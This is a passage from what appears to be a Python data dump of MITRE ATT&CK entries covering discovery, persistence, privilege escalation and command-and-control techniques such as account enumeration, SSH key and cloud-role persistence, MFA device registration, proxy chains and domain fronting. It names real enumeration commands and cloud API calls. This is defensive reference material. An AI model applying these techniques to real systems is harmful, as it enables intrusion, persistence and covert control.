                          'reinfections and broad access to systems and potentially to new and higher privileged '
                          'accounts. (Citation: Retwin Directory Share Pivot)\n'
                          '\n'
                          'Adversaries may also compromise shared network directories through binary infections by '
                          'appending or prepending its code to the healthy binary on the shared network directory. The '
                          'malware may modify the original entry point (OEP) of the healthy binary to ensure that it '
                          'is executed before the legitimate code. The infection could continue to spread via the '
                          'newly infected file when it is executed by a remote system. These infections may target '
                          'both binary and non-binary formats that end with extensions including, but not limited to, '
                          '.EXE, .DLL, .SCR, .BAT, and/or .VBS.',
           'name': 'Taint Shared Content',
           'platforms': ['Windows', 'Office 365', 'SaaS', 'Linux', 'macOS']},
 'T1082': {'attack_id': 'T1082',
           'categories': ['discovery'],
           'description': 'An adversary may attempt to get detailed information about the operating system and '
                          'hardware, including version, patches, hotfixes, service packs, and architecture. '
                          'Adversaries may use the information from [System Information '
                          'Discovery](https://attack.mitre.org/techniques/T1082) during automated discovery to shape '
                          'follow-on behaviors, including whether or not the adversary fully infects the target and/or '
                          'attempts specific actions.\n'
                          '\n'
                          'Tools such as [Systeminfo](https://attack.mitre.org/software/S0096) can be used to gather '
                          'detailed system information. If running with privileged access, a breakdown of system data '
                          'can be gathered through the <code>systemsetup</code> configuration tool on macOS. As an '
                          'example, adversaries with user-level access can execute the <code>df -aH</code> command to '
                          'obtain currently mounted disks and associated freely available space. Adversaries may also '
                          'leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network '
                          'devices to gather detailed system information (e.g. <code>show version</code>).(Citation: '
                          'US-CERT-TA18-106A) [System Information '
                          'Discovery](https://attack.mitre.org/techniques/T1082) combined with information gathered '
                          'from other forms of discovery and reconnaissance can drive payload development and '
                          'concealment.(Citation: OSX.FairyTale)(Citation: 20 macOS Common Tools and Techniques)\n'
                          '\n'
                          'Infrastructure as a Service (IaaS) cloud providers such as AWS, GCP, and Azure allow access '
                          'to instance and virtual machine information via APIs. Successful authenticated API calls '
                          'can return data such as the operating system platform and status of a particular instance '
                          'or the model view of a virtual machine.(Citation: Amazon Describe Instance)(Citation: '
                          'Google Instances Resource)(Citation: Microsoft Virutal Machine API)',
           'name': 'System Information Discovery',
           'platforms': ['Windows', 'IaaS', 'Linux', 'macOS', 'Network']},
 'T1083': {'attack_id': 'T1083',
           'categories': ['discovery'],
           'description': 'Adversaries may enumerate files and directories or may search in specific locations of a '
                          'host or network share for certain information within a file system. Adversaries may use the '
                          'information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) '
                          'during automated discovery to shape follow-on behaviors, including whether or not the '
                          'adversary fully infects the target and/or attempts specific actions.\n'
                          '\n'
                          'Many command shell utilities can be used to obtain this information. Examples include '
                          '<code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and '
                          '<code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to '
                          'gather file and directory information and interact with the [Native '
                          'API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network '
                          'Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather '
                          'file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or '
                          '<code>nvram</code>).(Citation: US-CERT-TA18-106A)\n'
                          '\n'
                          'Some files and directories may require elevated or specific user permissions to access.',
           'name': 'File and Directory Discovery',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1087': {'attack_id': 'T1087',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses '
                          'on a system or within a compromised environment. This information can help adversaries '
                          'determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, '
                          'spear-phishing attacks, or account takeovers (e.g., [Valid '
                          'Accounts](https://attack.mitre.org/techniques/T1078)).\n'
                          '\n'
                          'Adversaries may use several methods to enumerate accounts, including abuse of existing '
                          'tools, built-in commands, and potential misconfigurations that leak account names and roles '
                          'or permissions in the targeted environment.\n'
                          '\n'
                          'For examples, cloud environments typically provide easily accessible interfaces to obtain '
                          'user lists.(Citation: AWS List Users)(Citation: Google Cloud - IAM Servie Accounts List '
                          'API) On hosts, adversaries can use default '
                          '[PowerShell](https://attack.mitre.org/techniques/T1059/001) and other command line '
                          'functionality to identify accounts. Information about email addresses and accounts may also '
                          'be extracted by searching an infected system’s files.',
           'name': 'Account Discovery',
           'platforms': ['Windows', 'Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Linux', 'macOS', 'Google Workspace']},
 'T1087.001': {'attack_id': 'T1087.001',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of local system accounts. This information can '
                              'help adversaries determine which local accounts exist on a system to aid in follow-on '
                              'behavior.\n'
                              '\n'
                              'Commands such as <code>net user</code> and <code>net localgroup</code> of the '
                              '[Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and '
                              '<code>groups</code> on macOS and Linux can list local users and groups.(Citation: '
                              'Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users '
                              'can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS '
                              'the <code>dscl . list /Users</code> command can be used to enumerate local accounts.',
               'name': 'Local Account',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1087.002': {'attack_id': 'T1087.002',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of domain accounts. This information can help '
                              'adversaries determine which domain accounts exist to aid in follow-on behavior such as '
                              'targeting specific accounts which possess particular privileges.\n'
                              '\n'
                              'Commands such as <code>net user /domain</code> and <code>net group /domain</code> of '
                              'the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q '
                              'group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and '
                              'groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including '
                              '<code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of '
                              'Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)  ',
               'name': 'Domain Account',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1087.003': {'attack_id': 'T1087.003',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of email addresses and accounts. Adversaries '
                              'may try to dump Exchange address lists such as global address lists (GALs).(Citation: '
                              'Microsoft Exchange Address Lists)\n'
                              '\n'
                              'In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> '
                              'PowerShell cmdlet can be used to obtain email addresses and accounts from a domain '
                              'using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: '
                              'Black Hills Attacking Exchange MailSniper, 2016)\n'
                              '\n'
                              'In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google '
                              'Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google '
                              'Workspace Directory allows for users to get a listing of other users within the '
                              'organization.(Citation: Google Workspace Global Access List)',
               'name': 'Email Account',
               'platforms': ['Windows', 'Office 365', 'Google Workspace']},
 'T1087.004': {'attack_id': 'T1087.004',
               'categories': ['discovery'],
               'description': 'Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those '
                              'created and configured by an organization for use by users, remote support, services, '
                              'or for administration of resources within a cloud service provider or SaaS '
                              'application.\n'
                              '\n'
                              'With authenticated access there are several tools that can be used to find accounts. '
                              'The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account '
                              'names given a role or permissions group in Office 365.(Citation: Microsoft '
                              'msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an '
                              'interface to obtain user accounts with authenticated access to a domain. The command '
                              '<code>az ad user list</code> will list all users within a domain.(Citation: Microsoft '
                              'AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n'
                              '\n'
                              'The AWS command <code>aws iam list-users</code> may be used to obtain a list of users '
                              'in the current account while <code>aws iam list-roles</code> can obtain IAM roles that '
                              'have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In '
                              'GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects '
                              'get-iam-policy</code> may be used to obtain a listing of service accounts and users in '
                              'a project.(Citation: Google Cloud - IAM Servie Accounts List API)',
               'name': 'Cloud Account',
               'platforms': ['Azure AD', 'Office 365', 'SaaS', 'IaaS', 'Google Workspace']},
 'T1090': {'attack_id': 'T1090',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use a connection proxy to direct network traffic between systems or act as '
                          'an intermediary for network communications to a command and control server to avoid direct '
                          'connections to their infrastructure. Many tools exist that enable traffic redirection '
                          'through proxies or port redirection, including '
                          '[HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend '
                          'Micro APT Attack Tools) Adversaries use these types of proxies to manage command and '
                          'control communications, reduce the number of simultaneous outbound network connections, '
                          'provide resiliency in the face of connection loss, or to ride over existing trusted '
                          'communications paths between victims to avoid suspicion. Adversaries may chain together '
                          'multiple proxies to further disguise the source of malicious traffic.\n'
                          '\n'
                          'Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) '
                          'to proxy command and control traffic.',
           'name': 'Proxy',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1090.001': {'attack_id': 'T1090.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an internal proxy to direct command and control traffic between two '
                              'or more systems in a compromised environment. Many tools exist that enable traffic '
                              'redirection through proxies or port redirection, including '
                              '[HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: '
                              'Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and '
                              'control communications inside a compromised environment, to reduce the number of '
                              'simultaneous outbound network connections, to provide resiliency in the face of '
                              'connection loss, or to ride over existing trusted communications paths between infected '
                              'systems to avoid suspicion. Internal proxy connections may use common peer-to-peer '
                              '(p2p) networking protocols, such as SMB, to better blend in with the environment.\n'
                              '\n'
                              'By using a compromised internal system as a proxy, adversaries may conceal the true '
                              'destination of C2 traffic while reducing the need for numerous connections to external '
                              'systems.',
               'name': 'Internal Proxy',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1090.002': {'attack_id': 'T1090.002',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an external proxy to act as an intermediary for network '
                              'communications to a command and control server to avoid direct connections to their '
                              'infrastructure. Many tools exist that enable traffic redirection through proxies or '
                              'port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, '
                              'and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of '
                              'proxies to manage command and control communications, to provide resiliency in the face '
                              'of connection loss, or to ride over existing trusted communications paths to avoid '
                              'suspicion.\n'
                              '\n'
                              'External connection proxies are used to mask the destination of C2 traffic and are '
                              'typically implemented with port redirectors. Compromised systems outside of the victim '
                              'environment may be used for these purposes, as well as purchased infrastructure such as '
                              'cloud-based resources or virtual private servers. Proxies may be chosen based on the '
                              'low likelihood that a connection to them from a compromised system would be '
                              'investigated. Victim systems would communicate directly with the external proxy on the '
                              'Internet and then the proxy would forward communications to the C2 server.',
               'name': 'External Proxy',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1090.003': {'attack_id': 'T1090.003',
               'categories': ['command-and-control'],
               'description': 'Adversaries may chain together multiple proxies to disguise the source of malicious '
                              'traffic. Typically, a defender will be able to identify the last proxy traffic '
                              'traversed before it enters their network; the defender may or may not be able to '
                              'identify any previous proxies before the last-hop proxy. This technique makes '
                              'identifying the original source of the malicious traffic even more difficult by '
                              'requiring the defender to trace malicious traffic through several proxies to identify '
                              'its source.\n'
                              '\n'
                              'For example, adversaries may construct or use onion routing networks – such as the '
                              'publicly available [Tor](https://attack.mitre.org/software/S0183) network – to '
                              'transport encrypted C2 traffic through a compromised population, allowing communication '
                              'with any device within the network.(Citation: Onion Routing)\n'
                              '\n'
                              'In the case of network infrastructure, it is possible for an adversary to leverage '
                              'multiple compromised devices to create a multi-hop proxy chain (i.e., [Network '
                              'Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System '
                              'Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add '
                              'custom code to the affected network devices that will implement onion routing between '
                              'those nodes. This method is dependent upon the [Network Boundary '
                              'Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to '
                              'cross the protected network boundary of the Internet perimeter and into the '
                              'organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a '
                              'transport.\n'
                              '\n'
                              'Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented '
                              'infrastructure to implement routing between a decentralized network of peers.(Citation: '
                              'NGLite Trojan)',
               'name': 'Multi-hop Proxy',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1090.004': {'attack_id': 'T1090.004',
               'categories': ['command-and-control'],
               'description': 'Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) '
                              'and other services which host multiple domains to obfuscate the intended destination of '
                              'HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent '
                              'Communication through domain fronting 2015) Domain fronting involves using different '
                              'domain names in the SNI field of the TLS header and the Host field of the HTTP header. '
                              'If both domains are served from the same CDN, then the CDN may route to the address '
                              'specified in the HTTP header after unwrapping the TLS header. A variation of the the '
                              'technique, "domainless" fronting, utilizes a SNI field that is left blank; this may '
                              'allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP '
                              'Host fields match (if the blank SNI fields are ignored).\n'
                              '\n'
                              'For example, if domain-x and domain-y are customers of the same CDN, it is possible to '
                              'place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear '
                              'to be going to domain-x, however the CDN may route it to domain-y.',
               'name': 'Domain Fronting',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1091': {'attack_id': 'T1091',
           'categories': ['lateral-movement', 'initial-access'],
           'description': 'Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, '
                          'by copying malware to removable media and taking advantage of Autorun features when the '
                          'media is inserted into a system and executes. In the case of Lateral Movement, this may '
                          'occur through modification of executable files stored on removable media or by copying '
                          'malware and renaming it to look like a legitimate file to trick users into executing it on '
                          'a separate system. In the case of Initial Access, this may occur through manual '
                          'manipulation of the media, modification of systems used to initially format the media, or '
                          "modification to the media's firmware itself.\n"
                          '\n'
                          'Mobile devices may also be used to infect PCs with malware if connected via USB.(Citation: '
                          'Exploiting Smartphone USB ) This infection may be achieved using devices (Android, iOS, '
                          'etc.) and, in some instances, USB charging cables.(Citation: Windows Malware Infecting '
                          'Android)(Citation: iPhone Charging Cable Hack) For example, when a smartphone is connected '
                          'to a system, it may appear to be mounted similar to a USB-connected disk drive. If malware '
                          'that is compatible with the connected system is on the mobile device, the malware could '
                          'infect the machine (especially if Autorun features are enabled).',
           'name': 'Replication Through Removable Media',
           'platforms': ['Windows']},
 'T1092': {'attack_id': 'T1092',
           'categories': ['command-and-control'],
           'description': 'Adversaries can perform command and control between compromised hosts on potentially '
                          'disconnected networks using removable media to transfer commands from system to '
                          'system.(Citation: ESET Sednit USBStealer 2014) Both systems would need to be compromised, '
                          'with the likelihood that an Internet-connected system was compromised first and the second '
                          'through lateral movement by [Replication Through Removable '
                          'Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from '
                          'the disconnected system to the Internet-connected system to which the adversary has direct '
                          'access.',
           'name': 'Communication Through Removable Media',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1095': {'attack_id': 'T1095',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use an OSI non-application layer protocol for communication between host '
                          'and C2 server or among infected hosts within a network. The list of possible protocols is '
                          'extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer '
                          'protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, '
                          'such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure '
                          '(SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n'
                          '\n'
                          'ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) '
                          'Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by '
                          'all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored '
                          'as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide '
                          'communications.',
           'name': 'Non-Application Layer Protocol',
           'platforms': ['Windows', 'Linux', 'macOS', 'Network']},
 'T1098': {'attack_id': 'T1098',
           'categories': ['persistence', 'privilege-escalation'],
           'description': 'Adversaries may manipulate accounts to maintain and/or elevate access to victim systems. '
                          'Account manipulation may consist of any action that preserves or modifies adversary access '
                          'to a compromised account, such as modifying credentials or permission groups.(Citation: '
                          'FireEye SMOKEDHAM June 2021) These actions could also include account activity designed to '
                          'subvert security policies, such as performing iterative password updates to bypass password '
                          'duration policies and preserve the life of compromised credentials. \n'
                          '\n'
                          'In order to create or manipulate accounts, the adversary must already have sufficient '
                          'permissions on systems or the domain. However, account manipulation may also lead to '
                          'privilege escalation where modifications grant access to additional roles, permissions, or '
                          'higher-privileged [Valid Accounts](https://attack.mitre.org/techniques/T1078).',
           'name': 'Account Manipulation',
           'platforms': ['Windows',
                         'Azure AD',
                         'Office 365',
                         'IaaS',
                         'Linux',
                         'macOS',
                         'Google Workspace',
                         'SaaS',
                         'Network',
                         'Containers']},
 'T1098.001': {'attack_id': 'T1098.001',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may add adversary-controlled credentials to a cloud account to maintain '
                              'persistent access to victim accounts and instances within the environment.\n'
                              '\n'
                              'For example, adversaries may add credentials for Service Principals and Applications in '
                              'addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds '
                              'Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) '
                              'These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds '
                              'Customer Guidance) With sufficient permissions, there are a variety of ways to add '
                              'credentials including the Azure Portal, Azure command line interface, and Azure or Az '
                              'PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n'
                              '\n'
                              'In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud '
                              'Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or '
                              'import their own SSH keys using either the <code>CreateKeyPair</code> or '
                              '<code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys '
                              'add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to '
                              'instances within the cloud environment without further usage of the compromised cloud '
                              'accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)\n'
                              '\n'
                              'Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the '
                              '<code>gcloud iam service-accounts keys create</code> command in GCP to add access keys '
                              'to an account. If the target account has different permissions from the requesting '
                              'account, the adversary may also be able to escalate their privileges in the environment '
                              '(i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino '
                              'Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, '
                              'in Azure AD environments, an adversary with the Application Administrator role can add '
                              "a new set of credentials to their application's service principal. In doing so the "
                              'adversary would be able to access the service principal’s roles and permissions, which '
                              'may be different from those of the Application Administrator.(Citation: SpecterOps '
                              'Azure Privilege Escalation) \n'
                              '\n'
                              'In AWS environments, adversaries with the appropriate permissions may also use the '
                              '`sts:GetFederationToken` API call to create a temporary set of credentials to [Forge '
                              'Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of '
                              'the original user account. These temporary credentials may remain valid for the '
                              'duration of their lifetime even if the original account’s API credentials are '
                              'deactivated.\n'
                              '(Citation: Crowdstrike AWS User Federation Persistence)',
               'name': 'Additional Cloud Credentials',
               'platforms': ['IaaS', 'Azure AD', 'SaaS']},
 'T1098.002': {'attack_id': 'T1098.002',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may grant additional permission levels to maintain persistent access to an '
                              'adversary-controlled email account. \n'
                              '\n'
                              'For example, the <code>Add-MailboxPermission</code> '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in '
                              'on-premises Exchange and in the cloud-based service Office 365, adds permissions to a '
                              'mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 '
                              '2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation '
                              'can be enabled via the Google Admin console and users can delegate accounts via their '
                              'Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information '
                              'is Safe) \n'
                              '\n'
                              'Adversaries may also assign mailbox folder permissions through individual folder '
                              'permissions or roles. In Office 365 environments, adversaries may assign the Default or '
                              'Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or '
                              'other mailbox folders. By assigning one or both user permissions to a folder, the '
                              'adversary can utilize any other account in the tenant to maintain persistence to the '
                              'target user’s mail folders.(Citation: Mandiant Defend UNC2452 White Paper)\n'
                              '\n'
                              'This may be used in persistent threat incidents as well as BEC (Business Email '
                              'Compromise) incidents where an adversary can add [Additional Cloud '
                              'Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to '
                              'compromise. This may further enable use of additional techniques for gaining access to '
                              'systems. For example, compromised business accounts are often used to send messages to '
                              'other accounts in the network of the target business while creating inbox rules (ex: '
                              '[Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages '
                              'evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - '
                              '2019)',
               'name': 'Additional Email Delegate Permissions',
               'platforms': ['Windows', 'Office 365', 'Google Workspace']},
 'T1098.003': {'attack_id': 'T1098.003',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'An adversary may add additional roles or permissions to an adversary-controlled cloud '
                              'account to maintain persistent access to a tenant. For example, adversaries may update '
                              'IAM policies in cloud-based environments or add a new global administrator in Office '
                              '365 environments.(Citation: AWS IAM Policies and Permissions)(Citation: Google Cloud '
                              'IAM Policies)(Citation: Microsoft Support O365 Add Another Admin, October '
                              '2019)(Citation: Microsoft O365 Admin Roles) With sufficient permissions, a compromised '
                              'account can gain almost unlimited access to data and settings (including the ability to '
                              'reset the passwords of other admins).(Citation: Expel AWS Attacker)\n'
                              '(Citation: Microsoft O365 Admin Roles) \n'
                              '\n'
                              'This account modification may immediately follow [Create '
                              'Account](https://attack.mitre.org/techniques/T1136) or other malicious account '
                              'activity. Adversaries may also modify existing [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised. This '
                              'could lead to privilege escalation, particularly if the roles added allow for lateral '
                              'movement to additional accounts.\n'
                              '\n'
                              'For example, in AWS environments, an adversary with appropriate permissions may be able '
                              'to use the <code>CreatePolicyVersion</code> API to define a new version of an IAM '
                              'policy or the <code>AttachUserPolicy</code> API to attach an IAM policy with additional '
                              'or distinct permissions to a compromised user account.(Citation: Rhino Security Labs '
                              'AWS Privilege Escalation)\n'
                              '\n'
                              'In some cases, adversaries may add roles to adversary-controlled accounts outside the '
                              'victim cloud tenant. This allows these external accounts to perform actions inside the '
                              'victim tenant without requiring the adversary to [Create '
                              'Account](https://attack.mitre.org/techniques/T1136) or modify a victim-owned '
                              'account.(Citation: Invictus IR DangerDev 2024)',
               'name': 'Additional Cloud Roles',
               'platforms': ['Office 365', 'IaaS', 'SaaS', 'Google Workspace', 'Azure AD']},
 'T1098.004': {'attack_id': 'T1098.004',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may modify the SSH <code>authorized_keys</code> file to maintain '
                              'persistence on a victim host. Linux distributions and macOS commonly use key-based '
                              'authentication to secure the authentication process of SSH sessions for remote '
                              'management. The <code>authorized_keys</code> file in SSH specifies the SSH keys that '
                              'can be used for logging into the user account for which the file is configured. This '
                              "file is usually found in the user's home directory under "
                              '<code>&lt;user-home&gt;/.ssh/authorized_keys</code>.(Citation: SSH Authorized Keys) '
                              'Users may edit the system’s SSH config file to modify the directives '
                              'PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and '
                              'RSA authentication are enabled. The SSH config file is usually located under '
                              '<code>/etc/ssh/sshd_config</code>.\n'
                              '\n'
                              'Adversaries may modify SSH <code>authorized_keys</code> files directly with scripts or '
                              'shell commands to add their own adversary-supplied public keys. In cloud environments, '
                              'adversaries may be able to modify the SSH authorized_keys file of a particular virtual '
                              'machine via the command line interface or rest API. For example, by using the Google '
                              'Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user '
                              'account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege '
                              'Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a '
                              'virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual '
                              'Machines) This ensures that an adversary possessing the corresponding private key may '
                              'log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: '
                              'Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual '
                              'machine or instance has distinct permissions from the requesting user.\n'
                              '\n'
                              'Where authorized_keys files are modified via cloud APIs or command line interfaces, an '
                              'adversary may achieve privilege escalation on the target virtual machine if they add a '
                              'key to a higher-privileged user. \n'
                              '\n'
                              'SSH keys can also be added to accounts on network devices, such as with the `ip ssh '
                              'pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) '
                              'command.(Citation: cisco_ip_ssh_pubkey_ch_cmd)',
               'name': 'SSH Authorized Keys',
               'platforms': ['Linux', 'macOS', 'IaaS', 'Network']},
 'T1098.005': {'attack_id': 'T1098.005',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'Adversaries may register a device to an adversary-controlled account. Devices may be '
                              'registered in a multifactor authentication (MFA) system, which handles authentication '
                              'to the network, or in a device management system, which handles device access and '
                              'compliance.\n'
                              '\n'
                              'MFA systems, such as Duo or Okta, allow users to associate devices with their accounts '
                              'in order to complete MFA requirements. An adversary that compromises a user’s '
                              'credentials may enroll a new device in order to bypass initial MFA requirements and '
                              'gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: '
                              'DarkReading FireEye SolarWinds) In some cases, the MFA self-enrollment process may '
                              "require only a username and password to enroll the account's first device or to enroll "
                              'a device to an inactive account. (Citation: Mandiant APT29 Microsoft 365 2022)\n'
                              '\n'
                              'Similarly, an adversary with existing access to a network may register a device to '
                              'Azure AD and/or its device management system, Microsoft Intune, in order to access '
                              'sensitive data or resources while bypassing conditional access policies.(Citation: '
                              'AADInternals - Device Registration)(Citation: AADInternals - Conditional Access '
                              'Bypass)(Citation: Microsoft DEV-0537) \n'
                              '\n'
                              'Devices registered in Azure AD may be able to conduct [Internal '
                              'Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via '
                              'intra-organizational emails, which are less likely to be treated as suspicious by the '
                              'email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may '
                              'be able to perform a [Service Exhaustion '
                              'Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by '
                              'registering a large number of devices.(Citation: AADInternals - BPRT)',
               'name': 'Device Registration',
               'platforms': ['Azure AD', 'Windows', 'SaaS']},
 'T1098.006': {'attack_id': 'T1098.006',
               'categories': ['persistence', 'privilege-escalation'],
               'description': 'An adversary may add additional roles or permissions to an adversary-controlled user or '
                              'service account to maintain persistent access to a container orchestration system. For '
                              'example, an adversary with sufficient permissions may create a RoleBinding or a '
                              'ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: '
                              'Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access '
                              'control (ABAC) is in use, an adversary with sufficient permissions may modify a '
                              'Kubernetes ABAC policy to give the target account additional permissions.(Citation: '
                              'Kuberentes ABAC)\n'
                              ' \n'
                              'This account modification may immediately follow [Create '
                              'Account](https://attack.mitre.org/techniques/T1136) or other malicious account '
                              'activity. Adversaries may also modify existing [Valid '
                              'Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.  \n'
                              '\n'
                              'Note that where container orchestration systems are deployed in cloud environments, as '
                              'with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes '
                              'Service, cloud-based  role-based access control (RBAC) assignments or ABAC policies can '
                              'often be used in place of or in addition to local permission assignments.(Citation: '
                              'Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service '
                              'Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these '
                              'cases, this technique may be used in conjunction with [Additional Cloud '
                              'Roles](https://attack.mitre.org/techniques/T1098/003).',
               'name': 'Additional Container Cluster Roles',
               'platforms': ['Containers']},
 'T1102': {'attack_id': 'T1102',
           'categories': ['command-and-control'],
           'description': 'Adversaries may use an existing, legitimate external Web service as a means for relaying '
                          'data to/from a compromised system. Popular websites and social media acting as a mechanism '
                          'for C2 may give a significant amount of cover due to the likelihood that hosts within a '
                          'network are already communicating with them prior to a compromise. Using common services, '
                          'such as those offered by Google or Twitter, makes it easier for adversaries to hide in '
                          'expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries '
                          'an added level of protection.\n'
                          '\n'
                          'Use of Web services may also protect back-end C2 infrastructure from discovery through '
                          'malware binary analysis while also enabling operational resiliency (since this '
                          'infrastructure may be dynamically changed).',
           'name': 'Web Service',
           'platforms': ['Linux', 'macOS', 'Windows']},
 'T1102.001': {'attack_id': 'T1102.001',
               'categories': ['command-and-control'],
               'description': 'Adversaries may use an existing, legitimate external Web service to host information '
                              'that points to additional command and control (C2) infrastructure. Adversaries may post '
                              'content, known as a dead drop resolver, on Web services with embedded (and often '
                              'obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to '
                              'and be redirected by these resolvers.\n'
                              '\n'
                              'Popular websites and social media acting as a mechanism for C2 may give a significant '
                              'amount of cover due to the likelihood that hosts within a network are already '
                              'communicating with them prior to a compromise. Using common services, such as those '
                              'offered by Google or Twitter, makes it easier for adversaries to hide in expected '
                              'noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an '
                              'added level of protection.\n'
                              '\n'
